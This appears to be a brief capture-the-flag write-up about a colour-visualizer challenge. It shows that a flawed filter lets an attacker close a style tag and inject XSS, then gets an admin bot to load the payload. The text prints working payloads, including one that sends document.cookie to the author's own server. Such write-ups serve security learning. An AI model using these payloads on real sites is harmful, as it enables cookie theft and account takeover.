The Confused Deputy

less than 1 minute read




Let’s check out the source of the color visualizer.


In the source we can see how it’s setting the background color, and that it’s sanitizing the input to protect against XSS. Or is it?

I noticed in my tests that only the initial <> are being filtered out. Anything after that is fine.

So by escaping the style set variable, we can inject our XSS payload.

<></style><img src=x onerror=alert(document.cookie)>


So we have XSS, but we want to send the cookie back to us rather than alert it.

Here is the script that I hosted on my VPS:

img And here is the new payload:

<></style><img src=x onerror=document.location='http://REDACTED/cookie.php?c='+document.cookie>;

So now we can pass this information through the Admin page

URL to visit:

Color to see: payload